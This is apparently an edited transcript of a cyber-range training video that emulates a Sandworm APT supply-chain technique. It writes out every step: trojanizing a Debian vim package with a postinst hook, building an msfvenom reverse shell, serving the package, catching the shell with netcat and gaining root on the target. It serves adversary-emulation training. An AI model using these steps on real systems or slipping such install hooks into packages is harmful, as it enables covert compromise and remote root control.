How the Sandworm APT group operates

Learn the techniques the Sandworm APT hacking group used to compromise, pivot from and destroy a server. Then try to do it yourself in the Infosec Skills cyber range.

Executing the Sandworm APT with MITRE ATT&CK | Free Cyber Work Applied series Cyber Work listeners get free cybersecurity training resources. Click below to get your free courses and other materials.

Sandworm APT demo

The edited transcript of the Sandworm APT walkthrough video is provided below, separated into each step Keatron covers in the video.

Who is the Sandworm APT group?

(0:00- 0:22) Hello, my name is Keatron Evans, and I’m going to be showing you the Sandworm APT. This particular exercise and group that we’re going to be emulating here was one of the most prevalent and prominent groups — as far as APT groups — all the way from 2009 up to now. They’re still pretty prevalent. They have a lot of stuff out there going on right now.

Mapping threats to the MITRE ATT&CK framework

(0:23- 0:51) One of the things that we want to make sure we point out is that with this particular lab, as is the case with all of our cyber range labs, it’s mapped directly to the MITRE ATT&CK framework. This deals with client execution and client exploitation, supply chain exploitation, and several others that are tied directly to this specific exercise. So let’s jump right into the lab and get to work with it and let you see how it looks.

Trojanizing a .deb file

(0:52- 2:39) Alright, so one of the first things that we’re going to do here is we’re going to actually trojanize a .deb file, which is basically just an installation file. If you can imagine you’re on your Windows machine, you go download a file from the internet, then you double click and install something. Well, a .deb file is a Debian equivalent of that. And since we’re working with Kali Linux here, which runs on top of Debian, .deb files are the best thing to do that with. We’re going to start off by simply making a directory. We’ll go ahead and open that machine up here and open a prompt. And we’re simply going to make a directory. root@ip-172-20-6-41:/# mkdir /tmp/work Then we’re going to cd to that directory that we just made. root@ip-172-20-6-41:/# cd tmp/ Then we’re going to deep package this Debian file here. root@ip-172-20-6-41:/tmp# cd /tmp root@ip-172-20-6-41:/tmp# dpkg -x ~/wim.deb work One of the key things and one of the things that we really like about the way we design the cyber range is that after you finish each step or each group of tasks, it actually gives you a green checkmark to let you know that you’ve completed that task. This lab might take you 25-30 minutes to finish, so I won’t go through all of it. I’ll save some for you to jump over into the range and play with yourself for the end here. And now we’re going to move on to step two.

Creating the control file

(2:40- 6:19) In this new directory, we will create a file so we can package our application. We’re going to make a directory named work. One of the things I want to point out is we can go back and forth here. You can navigate back and forth between the different machines that you’re working with or the different steps that you’re working on. What we’re going to be doing now is basically creating another directory here, and we’re going to be putting inside that directory an actual file here. Let’s go ahead and open up a prompt. Now we’ve got both machines up and running here. We’re going to go back to our Kali, we’re going to make that directory name “work/DEBIAN” like so. root@ip-172-20-6-41:/tmp# mkdir work/DEBIAN And then we’re going to cd to that directory. root@ip-172-20-6-41:/tmp# cd work/DEBIAN And then we’re going to create a file here. We’re going to use just a text editor. We can use whatever you want to use as far as a text editor. But we’re going to use nano here. So we’re going to open up “nano control.” root@ip-172-20-6-41:/tmp/work/DEBIAN# nano control Since this file doesn’t already exist, you’re effectively creating it when you open it up in nano there. Now, another thing is you could type all the strings out that are in this file, or you could use the copy option here and paste it directly into nano like so. And now you’ve essentially created a file. One of the cool things about the way our labs are set up is if you, for example, didn’t know how to copy and paste something into nano or you didn’t know how to even open nano. Well, there is actually the hint button here. So if you click on need a hint, it actually walks you through more details about what we’re doing. Keep in mind this is an Advanced Adversary Tactics lab that’s mapped to the MITRE ATT&CK framework. So it’s really designed around the concept of having someone with some experience already coming in here and working with this. However, we’ve built into the experience the ability for even a beginner to get in here and actually eventually get through the lab. They’re going to need a lot of hints. They’re going to have to click on “need a hint” a lot. But it’s there if they want to tackle it and they should be able to get through it. We’re going to go ahead and actually close off this particular file. We’re going to basically tell nano to save this. And now we’ve got our file created. And what you notice is we get the green check to let us know that we successfully completed that part of the exercise.

Creating the postinst file

(6:20- 7:49) In the next step, we’re going to create a post-installation file. We’re going to create this file the same way we did before. We’re going to use nano to create it. root@ip-172-20-6-41:/tmp/work/DEBIAN# nano postinst We’re going to take this content right here. And we’re going to put it into this file again. #!/bin/sh Sudo chmod 2755 /usr/share/vim/addons/update && /usr/share/vim/addons/update You could type it out, or you could paste it like I did here. Then after you create this file, we’re going to ctrl X to save it. Now again, saving out of it with ctrl X is something that a beginner wouldn’t know because maybe you’re not comfortable or not used to the Linux command line. But we didn’t put detailed instructions like that in here. This is where you’d again, go back to the need to hit or whatever the case may be to figure out how to do those basic things that aren’t really related to the lab. Again, this is us trying to make sure that you can actually get through it. So we go ahead and say yes, to save it. Alright, now we’re going to change permissions. In other words, if we want to be able to execute this, we have to give it the execute permission. And we’re going to do that in Linux with this command right here: chmod. root@ip-172-20-6-41:/tmp/work/DEBIAN# chmod 755 postinst And then notice once we’ve done all the tasks in here, that it asks us to do, then it gives us the green checkmark to let us know we’re successful.

Creating the payload

(7:50- 10:31) All right, so now we’re going to go into the steps of creating an actual payload. So the file that we’ve just created will be run after the installation. It’ll execute the file at the specific update location that you see listed there. And then we can create a reverse shell with MSFvenom, which is a tool that we use in the industry to create malicious malware of our own. It’s kind of like becoming a malware author. Now in this particular one, it actually gives you cautionary steps. Be sure to swap out the attacker’s IP with your IP. That way, you’re actually putting something in there that can be made to come back. So first, let’s make this directory: root@ip-172-20-6-41:/tmp/work/DEBIAN# mkdir -p /tmp/work/usr/share/vim/addons Alright, we did that. Then we’re going to run the venom command to create the actual executable. What here’s — we don’t necessarily spell this out in detail. But what we’re expecting is that you’re advanced enough to realize that, okay, we have to change the attacker IP part here to be our IP, because that’s what the instruction said. Now this again, opens up another part of where you have to be a little bit beyond basic because you got to realize, Okay, I got to go and actually check and see what my IP is. In my case, my IP is 172.20.6.41. So I need to go ahead and put that in there. In that command, in lieu of just saying attacker IP.  I need to put my actual IP there. And that’s what this note is telling you up here. root@ip-172-20-6-41:/tmp/work/DEBIAN# msfvenom -a x64 – platform linux -p linux/x64/shell_reverse_tcp LHOST=172.20.6.41 LPORT=443 -b “\x00” -f elf -o /tmp/work/usr/share/vim/addons/update Now, again, show hints can help you and even if that doesn’t help you enough, what you can do is if you look at the screenshot, you can see that first we check to see what our IP address is. And then you can see the order in which we did the commands here to actually make this work. The last step is to actually run the venom command to create the malicious binary. So we execute that. And you have to be patient and give us a minute as it’s going through and doing these things. Found 4 compatible encoders Attempting to encode payload with 1 iterations of generic/none generic/none failed with Encoding failed due to a bad character (index=17, char=0x00) Attempting to encode payload with 1 iterations of generic/none x64/xor succeeded with size 199 (iteration=0) x64/xor chosen with final size 119 Payload size: 119 bytes Final size of elf file: 239 bytes Saved as: /tmp/work/usr/share/vim/addons/update Now you can see it created our malicious file, and it says that it created that binary, saved it to the location: /tmp/work/usr/share/vim/addons/update. Notice when I finished all those steps, it actually then gave me the green checkmark and said “You’re good to go. You’ve created your malicious file.”

Preparing the package

(10:32- 13:19) Now we need to actually prepare the package. When the malicious app is installed and the reverse shell should be sent back to us, we need something that can actually grab that connection as it comes back. So to do that, what we’re going to do is set up a Netcat listener. The first step we’re going to do is actually cd to the temp directory. root@ip-172-20-6-41:/tmp/work/DEBIAN# cd /tmp Alright, and then we’re gonna do a depackage right here. root@ip-172-20-6-41:/tmp# dpkg-deb –build /tmp/work dpkg-deb: building package ‘vim’ in ‘/tmp/work.deb’. Then we’re going to CD. root@ip-172-20-6-41:/tmp# cd root@ip-172-20-6-41:(tidle)# mkdir dist Then we’re going to do a move command. So we’re going to move the .deb file that’s in work to this other location here. root@ip-172-20-6-41:(tidle)# mv /tmp/work.deb ./vim.deb Then we’re going to run this Python command here to start to basically run this HTTP server. root@ip-172-20-6-41:(tidle)# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) … Now it’s listening and serving stuff out of this directory on port 80. And then in a different terminal, we’re going to run Netcat. They note here that you’re in a different terminal because if you try to run it here, you’re going to kill the little web server that you just launched. So we have to go over to a different terminal. We’ll use a second one that I pulled up earlier to check my IP. I’m going to now have Netcat listen on port 443. root@ip-172-20-6-41:/# nc -nvlp 443 Listening on 0.0.0.0 443 And notice again, when I’ve completed all those tasks, it gives me the green thumb. Now one thing I want to point out is when I did the steps of creating the Debian work directory and running venom, notice I didn’t particularly run them in the exact same order that it is in the screenshot, but I still got the green checkmark. This is because we’ve built these environments, so it’s really checking to see that you get the task done, not so much that you typed the exact command a certain way, because that’s really not how we learn anyways. So as you can see here, as long as you get the steps done, the order that you did them in didn’t necessarily matter. Now, for some exercises, the order will matter. But in this one, we just wanted to make sure that you got all the things done.

Triggering the exploit

(13:20- 15:08) Then we move on to the next step where we’re going to trigger the exploit. To do that, we need to switch over to the victim machine or the target. So we’re going to go to our target here. I’m gonna do a wget, go to the student machine, which is the Kali machine that we’re just working on, and bring down this .deb file. admin@ip-172-20-16-231: $ wget student/vim.deb Notice it says that it successfully brought down and saved that file for you. We’re going to depackage that .deb file. This would be the same as if you installed a file if this were a Windows environment, for those of you that are more familiar with Windows. We go ahead and paste that command to do that depackage. admin@ip-172-20-16-231: $ sudo dpkg -i vim.deb And we can see it depackaged and installed. Now what you want to look for is if you go back to the original machine, where we’re listening, you will see that there is now a connection that came back from the other side. So now we can actually run commands on that victim machine as you can see right here. And if we do what it says in the instructions, we come over here and do ID. It actually shows us that we’re running as root and from that point, we own this box. We can run any root privilege level commands that we like, and what you just saw there was exactly one of the techniques that are used by the Sandworm APT group to do these types of things. And this maps nicely to four or five different MITRE ATT&CK framework pieces there.

Try this cyber range yourself

Thank you for watching. If you want to do this exercise just like what I just showed you — and complete it — then head on over to our free cybersecurity training resources page and create your free account. You can find this particular exercise in the Advanced Adversary Tactics Cyber Range. Thanks for watching.